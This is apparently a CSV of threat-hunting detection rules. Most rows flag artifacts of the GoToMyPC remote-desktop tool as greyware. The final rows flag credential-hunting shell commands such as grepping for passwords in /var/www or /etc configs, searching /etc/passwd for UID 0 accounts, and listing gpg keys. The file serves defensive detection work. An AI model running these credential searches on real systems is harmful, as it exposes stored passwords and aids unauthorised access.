"* DownloadServer=https://www.gotomypc.com *",".{0,1000}\sDownloadServer\=https\:\/\/www\.gotomypc\.com\s.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* gotoopener://launch.getgo.com/*",".{0,1000}\sgotoopener\:\/\/launch\.getgo\.com\/.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* LoggingServer=logging.getgo.com ProxyHost=*",".{0,1000}\sLoggingServer\=logging\.getgo\.com\sProxyHost\=.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\GoToMyPC\*",".{0,1000}\\AppData\\Local\\GoToMyPC\\.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\*\gosetup.exe*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\gosetup\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\*\GoToOpener.msi*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\GoToOpener\.msi.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Citrix\GoToMyPc\FileTransfer\history*",".{0,1000}\\Citrix\\GoToMyPc\\FileTransfer\\history.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Citrix\GoToMyPc\GuestInvite*",".{0,1000}\\Citrix\\GoToMyPc\\GuestInvite.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\g2comm.exe*",".{0,1000}\\g2comm\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\g2fileh.exe*",".{0,1000}\\g2fileh\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\g2host.exe*",".{0,1000}\\g2host\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\g2mainh.exe*",".{0,1000}\\g2mainh\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\g2printh.exe*",".{0,1000}\\g2printh\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\g2svc.exe*",".{0,1000}\\g2svc\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\goLoader.exe*",".{0,1000}\\goLoader\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\gosetup[1].exe*",".{0,1000}\\gosetup\[1\]\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\GoTo Opener.exe*",".{0,1000}\\GoTo\sOpener\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\GoTo\Logs\goto.log*",".{0,1000}\\GoTo\\Logs\\goto\.log.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\gotomon.dll*",".{0,1000}\\gotomon\.dll.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\gotomon_x64.dll*",".{0,1000}\\gotomon_x64\.dll.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\GoToMyPC.cab*",".{0,1000}\\GoToMyPC\.cab.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\GoToMyPC\*\*\g2ldr.log*",".{0,1000}\\GoToMyPC\\.{0,1000}\\.{0,1000}\\g2ldr\.log.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\gotomypc\g2pre.exe*",".{0,1000}\\gotomypc\\g2pre\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\GoToMyPC\g2svc.exe*",".{0,1000}\\GoToMyPC\\g2svc\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\gotomypc_3944.exe*",".{0,1000}\\gotomypc_3944\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\GoToMyPCCrashHandler.exe*",".{0,1000}\\GoToMyPCCrashHandler\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\GoToOpener.log*",".{0,1000}\\GoToOpener\.log.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\GoToOpener[1].msi*",".{0,1000}\\GoToOpener\[1\]\.msi.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ICON_ID_GOTOMYPC*",".{0,1000}\\ICON_ID_GOTOMYPC.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Local\Temp\LogMeInLogs\GoToOpenerMsi\*",".{0,1000}\\Local\\Temp\\LogMeInLogs\\GoToOpenerMsi\\.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LogMeInLogs\GoToOpenerMsi*",".{0,1000}\\LogMeInLogs\\GoToOpenerMsi.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\novaPDF11OEM(x64).msi*",".{0,1000}\\novaPDF11OEM\(x64\)\.msi.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\program files (x86)\gotomypc\g2tray.exe*",".{0,1000}\\program\sfiles\s\(x86\)\\gotomypc\\g2tray\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Programs\GoToMyPC.lnk*",".{0,1000}\\Programs\\GoToMyPC\.lnk.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\WOW6432Node\Citrix\GoToMyPc*",".{0,1000}\\WOW6432Node\\Citrix\\GoToMyPc.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\x64\monblanking.sys*",".{0,1000}\\x64\\monblanking\.sys.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Data>Installed GoToMyPC</Data>*",".{0,1000}\<Data\>Installed\sGoToMyPC\<\/Data\>.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*=http://www.gotomypc.com/downloads/viewer *",".{0,1000}\=http\:\/\/www\.gotomypc\.com\/downloads\/viewer\s.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*api-telemetry.servers.getgo.com*",".{0,1000}api\-telemetry\.servers\.getgo\.com.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ApplicationName'>GoTo Opener*",".{0,1000}ApplicationName\'\>GoTo\sOpener.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ApplicationName'>GoToMyPC Communications*",".{0,1000}ApplicationName\'\>GoToMyPC\sCommunications.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ApplicationName'>GoToMyPC Host Launcher*",".{0,1000}ApplicationName\'\>GoToMyPC\sHost\sLauncher.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ApplicationName'>GoToMyPC Viewer*",".{0,1000}ApplicationName\'\>GoToMyPC\sViewer.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*cf3de8f800852490f39fdacbe74627564494235f*",".{0,1000}cf3de8f800852490f39fdacbe74627564494235f.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*G2MScrUtil64.exe*/cr*",".{0,1000}G2MScrUtil64\.exe.{0,1000}\/cr.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*g2mui.exe*/cr*",".{0,1000}g2mui\.exe.{0,1000}\/cr.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*GoTo MyPC Installer.exe*",".{0,1000}GoTo\sMyPC\sInstaller\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*GOTO MYPC INSTALLER.EXE-*.pf*",".{0,1000}GOTO\sMYPC\sINSTALLER\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*GoTo Opener.exe *",".{0,1000}GoTo\sOpener\.exe\s.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*GOTO OPENER.EXE-*.pf*",".{0,1000}GOTO\sOPENER\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Goto.exe*?type=crashpad-handler*",".{0,1000}Goto\.exe.{0,1000}\?type\=crashpad\-handler.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*GoToMyPC_Installation.log*",".{0,1000}GoToMyPC_Installation\.log.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*GoToMyPC_Setup.log*",".{0,1000}GoToMyPC_Setup\.log.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*GoToMyPCSetup_x64.msi*",".{0,1000}GoToMyPCSetup_x64\.msi.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*GoToScrUtils.exe*/cr*",".{0,1000}GoToScrUtils\.exe.{0,1000}\/cr.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*launcher-rest-new.live.corecollab.ucc-prod.eva.goto.com*",".{0,1000}launcher\-rest\-new\.live\.corecollab\.ucc\-prod\.eva\.goto\.com.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*novaPDF11PrinterDriver(x64).msi*",".{0,1000}novaPDF11PrinterDriver\(x64\)\.msi.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*PollServer poll.gotomypc.com*",".{0,1000}PollServer\spoll\.gotomypc\.com.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ServiceName'>GoToMyPC*",".{0,1000}ServiceName\'\>GoToMyPC.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*gpg --list-keys*",".{0,1000}gpg\s\-\-list\-keys.{0,1000}","greyware_tool_keyword","gpg","List gpg keys for privilege escalation","T1553.002","TA0006","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","4","8","N/A","N/A","N/A","N/A"
"*grep -* *DBPassword*",".{0,1000}grep\s\-.{0,1000}\s.{0,1000}DBPassword.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*grep *password /var/www*",".{0,1000}grep\s.{0,1000}password\s\/var\/www.{0,1000}","greyware_tool_keyword","grep","search for passwords","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*grep *password.* /etc/*.conf*",".{0,1000}grep\s.{0,1000}password\..{0,1000}\s\/etc\/.{0,1000}\.conf.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*grep :0: /etc/passwd*",".{0,1000}grep\s\:0\:\s\/etc\/passwd.{0,1000}","greyware_tool_keyword","grep","Look for users with a UID of 0","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*grep -i pass *",".{0,1000}grep\s\-i\spass\s.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*grep -i user *",".{0,1000}grep\s\-i\suser\s.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://gtfobins.github.io/","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*grep -R db_passwd*",".{0,1000}grep\s\-R\sdb_passwd.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
